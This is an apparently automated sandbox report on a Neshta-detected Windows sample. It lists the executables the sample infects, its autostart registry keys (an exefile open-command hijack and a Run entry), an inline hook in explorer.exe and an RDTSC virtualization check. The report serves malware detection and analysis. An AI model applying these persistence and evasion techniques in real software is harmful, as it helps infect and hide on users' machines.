          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
          Sample is not signed and drops a device driver
          Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\Windows\svchost.com
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | File created: C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
          Source: C:\Windows\svchost.com | File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | File created: C:\Users\user\AppData\Local\Temp\nsrAB5E.tmp\System.dll
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | File created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
          Source: C:\Windows\svchost.com | File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
          Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\Windows\svchost.com

          Boot Survival:

          Yara detected Neshta
          Source: Yara match | File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match | File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauh

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.com | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
